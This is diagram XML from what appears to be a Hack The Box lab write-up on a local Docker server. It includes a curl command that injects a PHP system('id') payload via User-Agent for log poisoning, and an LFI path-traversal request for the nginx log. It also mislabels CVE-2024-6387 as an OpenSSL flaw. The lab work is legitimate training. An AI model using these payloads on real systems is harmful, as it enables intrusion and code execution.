    <dgm:cxn modelId="{A184C0DF-BCDC-45F3-87B2-DBF36C6C1708}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{2C2C4A3B-0C2E-48D1-A08D-A1A672B25D71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175C99-3EF5-4DD2-987E-6F30E423A44B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="823455" y="1394"/>
          <a:ext cx="915714" cy="915714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D79F-42B0-4829-B00D-B024C26EA83C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1018607" y="196546"/>
          <a:ext cx="525410" cy="5254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4B6A80-5140-40DE-A61A-2F8C784EC16A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="530726" y="1202331"/>
          <a:ext cx="1501171" cy="656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Nmap for the network and service enumeration.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="11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30726" y="1202331"/>
        <a:ext cx="1501171" cy="656762"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E4F14064-33B9-4A7B-B413-6C9B1C484B13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2587332" y="1394"/>
          <a:ext cx="915714" cy="915714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48A3C-C484-40A4-8E4D-88180BCDAE90}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2782484" y="196546"/>
          <a:ext cx="525410" cy="5254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541CA6-FF50-40D5-AEED-480A5EBF4F58}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2294603" y="1202331"/>
          <a:ext cx="1501171" cy="656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 err="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Netcat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="11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 (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="0" i="0" kern="1200" err="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="11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) for manual service interaction, AND banner grabbing.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="11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94603" y="1202331"/>
        <a:ext cx="1501171" cy="656762"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4FCC8041-9B80-4132-B472-491F76938797}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4351209" y="1394"/>
          <a:ext cx="915714" cy="915714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A410F4-7C34-43E6-B567-B5F93B0AA8E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4546361" y="196546"/>
          <a:ext cx="525410" cy="5254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7B3A4F-8694-4B2D-8C88-F1128EE40F5A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4058480" y="1202331"/>
          <a:ext cx="1501171" cy="656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Docker for setting up the local Secure Server environment.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="11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058480" y="1202331"/>
        <a:ext cx="1501171" cy="656762"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{55A781B3-0397-48C4-B76C-EEFEEBDBB5EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6115086" y="1394"/>
          <a:ext cx="915714" cy="915714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35FC07-3D36-490E-BD95-5A6749D7F565}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6310238" y="196546"/>
          <a:ext cx="525410" cy="52541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113540-EBAB-4445-9A1D-4C4BCA56D261}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5822357" y="1202331"/>
          <a:ext cx="1501171" cy="656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Curl for HTTP requests and LFI exploitation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="11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822357" y="1202331"/>
        <a:ext cx="1501171" cy="656762"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{28CC85DF-37D5-4037-87F4-83A746D2BA1C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7878962" y="1394"/>
          <a:ext cx="915714" cy="915714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81BA35-47A5-4B1E-B621-939AD26E8F8F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8074115" y="196546"/>
          <a:ext cx="525410" cy="52541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E1E5AA-74BA-45CB-88CB-63A70B5F7D19}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7586234" y="1202331"/>
          <a:ext cx="1501171" cy="656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Samba (SMB) for accessing and modifying the web server files via CIFS mount.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="11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586234" y="1202331"/>
        <a:ext cx="1501171" cy="656762"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E053482C-DCD7-4BBE-A13C-BDFC013892FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4351209" y="2234387"/>
          <a:ext cx="915714" cy="915714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F0C0EE-BA56-4323-9CF8-26EA11EA1BD7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4546361" y="2429539"/>
          <a:ext cx="525410" cy="52541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D8A8D9-6F8B-40D5-A0DA-75DE358048C7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4058480" y="3435324"/>
          <a:ext cx="1501171" cy="656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PHP patching for secure coding validation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="11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058480" y="3435324"/>
        <a:ext cx="1501171" cy="6567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6EB327-953B-47E0-B7D8-72C9CF2DAFB7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2781118" y="849169"/>
          <a:ext cx="6077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07775" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/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69046" y="891697"/>
        <a:ext cx="31918" cy="6383"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CE54430D-A794-40CD-B3CC-7BD1EB03CABD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7373" y="62226"/>
          <a:ext cx="2775545" cy="166532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04" tIns="142760" rIns="136004" bIns="1427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>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt;  Connect to HTB either via </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" err="1">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>openVPN</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t> or PWN.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200">
            <a:latin typeface="Times New Roman"/>
            <a:cs typeface="Times New Roman"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7373" y="62226"/>
        <a:ext cx="2775545" cy="1665327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5DFA05A8-22D2-4707-B7CF-9B5626A90F38}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6195039" y="849169"/>
          <a:ext cx="6077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07775" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/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482967" y="891697"/>
        <a:ext cx="31918" cy="6383"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50851DCE-81E3-445C-B0DA-5E5512DE6FCF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3421293" y="62226"/>
          <a:ext cx="2775545" cy="16653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04" tIns="142760" rIns="136004" bIns="1427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>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt; Start instance and fetch the IP address and port number along with the necessary download files.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200">
            <a:latin typeface="Times New Roman"/>
            <a:cs typeface="Times New Roman"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3421293" y="62226"/>
        <a:ext cx="2775545" cy="1665327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{75DE83CA-1446-4CC9-B216-1248D22C579F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1395145" y="1725753"/>
          <a:ext cx="6827841" cy="607775"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="6827841" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="6827841" y="320987"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="320987"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="607775"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/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37626" y="2026449"/>
        <a:ext cx="342880" cy="6383"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BAF20D91-C2EC-4016-B09A-4ABE8470E2ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6835214" y="62226"/>
          <a:ext cx="2775545" cy="166532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04" tIns="142760" rIns="136004" bIns="1427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>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt; We connect to the IP address and make sure that it is pingable.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200">
            <a:latin typeface="Times New Roman"/>
            <a:cs typeface="Times New Roman"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6835214" y="62226"/>
        <a:ext cx="2775545" cy="1665327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0004756B-94C7-4337-A08F-2BC00A4C57E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2781118" y="3152872"/>
          <a:ext cx="6077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07775" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="1270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69046" y="3195400"/>
        <a:ext cx="31918" cy="6383"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6C42A663-A072-49D8-A347-1A3487339C87}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7373" y="2365928"/>
          <a:ext cx="2775545" cy="166532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04" tIns="142760" rIns="136004" bIns="1427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>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt; We ran </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" err="1">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>nmap</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" err="1">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>netcat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t> on the server IP for banner grabbing, checking HTTP headers and manual  fuzzing for common vulnerabilities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200">
            <a:latin typeface="Times New Roman"/>
            <a:cs typeface="Times New Roman"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7373" y="2365928"/>
        <a:ext cx="2775545" cy="1665327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BAA20668-4968-44F2-B76D-434C72C633D6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6195039" y="3152872"/>
          <a:ext cx="6077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07775" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="1270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482967" y="3195400"/>
        <a:ext cx="31918" cy="6383"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00C0D873-FDB4-43B3-8745-6D8D7026A357}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3421293" y="2365928"/>
          <a:ext cx="2775545" cy="166532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04" tIns="142760" rIns="136004" bIns="1427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>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt; We discovered an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" err="1">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>openssl</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t> vulnerability: CVE 2024-6387: </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200">
            <a:latin typeface="Times New Roman"/>
            <a:cs typeface="Times New Roman"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3421293" y="2365928"/>
        <a:ext cx="2775545" cy="1665327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{84CE5DD9-C805-4E2E-817A-1A0B994246F1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6835214" y="2365928"/>
          <a:ext cx="2775545" cy="166532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04" tIns="142760" rIns="136004" bIns="14276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Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1800" kern="1200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>139, 445 (Samba-related ports) – suggesting potential SMB exposure</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6835214" y="2365928"/>
        <a:ext cx="2775545" cy="16653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466146-AAF9-4249-A3B8-5F52C20662D2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1763614" y="2274"/>
          <a:ext cx="1984066" cy="9944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-&gt;Secure Server Docker environment built successfully using the provided Dockerfile and build script.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1812158" y="50818"/>
        <a:ext cx="1886978" cy="897349"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{56C6D416-7918-4BD1-B6E4-E7978C913F28}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1763614" y="1046433"/>
          <a:ext cx="1984066" cy="9944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-&gt;Services running inside Docker:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1812158" y="1094977"/>
        <a:ext cx="1886978" cy="897349"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{68A17801-78DB-4DBE-8DC0-BDECD32746FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1763614" y="2090593"/>
          <a:ext cx="1984066" cy="9944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-&gt;Nginx (web server)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1812158" y="2139137"/>
        <a:ext cx="1886978" cy="897349"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6E446B22-99AC-48E8-8C98-6C4BA7961C95}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1763614" y="3134752"/>
          <a:ext cx="1984066" cy="9944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-&gt;PHP-FPM (PHP processing)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1812158" y="3183296"/>
        <a:ext cx="1886978" cy="897349"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E2B938E1-7E61-4862-B4A8-4D898BB3C8E0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1763614" y="4178912"/>
          <a:ext cx="1984066" cy="9944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-&gt;Samba (SMB for file sharing)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1812158" y="4227456"/>
        <a:ext cx="1886978" cy="8973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1C545F-6748-4DA7-8B30-11811361D0B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="80422"/>
          <a:ext cx="6628804" cy="64642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Injected PHP payload via the User-Agent header using curl:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31556" y="111978"/>
        <a:ext cx="6565692" cy="583313"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{528555C8-0CF9-4DAE-B7CC-9E71D49778EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="775807"/>
          <a:ext cx="6628804" cy="646425"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="-494048"/>
                <a:satOff val="2367"/>
                <a:lumOff val="2190"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-494048"/>
                <a:satOff val="2367"/>
                <a:lumOff val="219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curl -A "&lt;?php system('id'); ?&gt;" http://127.0.0.1/</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31556" y="807363"/>
        <a:ext cx="6565692" cy="583313"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{569C91AF-E90F-4EC5-BEBF-DB452E985C58}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1471193"/>
          <a:ext cx="6628804" cy="646425"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="-988095"/>
                <a:satOff val="4733"/>
                <a:lumOff val="4379"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-988095"/>
                <a:satOff val="4733"/>
                <a:lumOff val="4379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Successfully retrieved the Nginx access logs using Local File Inclusion (LFI):</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31556" y="1502749"/>
        <a:ext cx="6565692" cy="583313"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{47191A6C-A477-4D90-ACBB-7BB193FE2782}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2166578"/>
          <a:ext cx="6628804" cy="646425"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="-1482143"/>
                <a:satOff val="7100"/>
                <a:lumOff val="6569"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-1482143"/>
                <a:satOff val="7100"/>
                <a:lumOff val="6569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curl "http://127.0.0.1/our-projects.php?project=../../../../var/log/nginx/access.log"</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31556" y="2198134"/>
        <a:ext cx="6565692" cy="583313"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EDCD4CA2-19BB-45F9-914C-D4C74F2AC34F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2861963"/>
          <a:ext cx="6628804" cy="646425"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="-1976191"/>
                <a:satOff val="9467"/>
                <a:lumOff val="8758"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-1976191"/>
                <a:satOff val="9467"/>
                <a:lumOff val="875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Log entries confirmed injection, but PHP payload was not executed (logged as plain text).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31556" y="2893519"/>
        <a:ext cx="6565692" cy="583313"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E24C070F-3582-4BF7-88F8-B9974ED8BD7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3557348"/>
          <a:ext cx="6628804" cy="646425"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="-2470238"/>
                <a:satOff val="11833"/>
                <a:lumOff val="10948"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-2470238"/>
                <a:satOff val="11833"/>
                <a:lumOff val="1094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Conclusion:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31556" y="3588904"/>
        <a:ext cx="6565692" cy="583313"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{09847BAE-8F35-4AAB-91E7-103C46D2FD00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4252733"/>
          <a:ext cx="6628804" cy="646425"/>
        </a:xfrm>
        <a:prstGeom prst="roundRec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96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-2964286"/>
                <a:satOff val="14200"/>
                <a:lumOff val="1313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· LFI vulnerability confirmed but log poisoning failed to trigger PHP code execution.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31556" y="4284289"/>
        <a:ext cx="6565692" cy="58331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2AD0FF-C7DA-467E-A00D-F121884F7B0D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
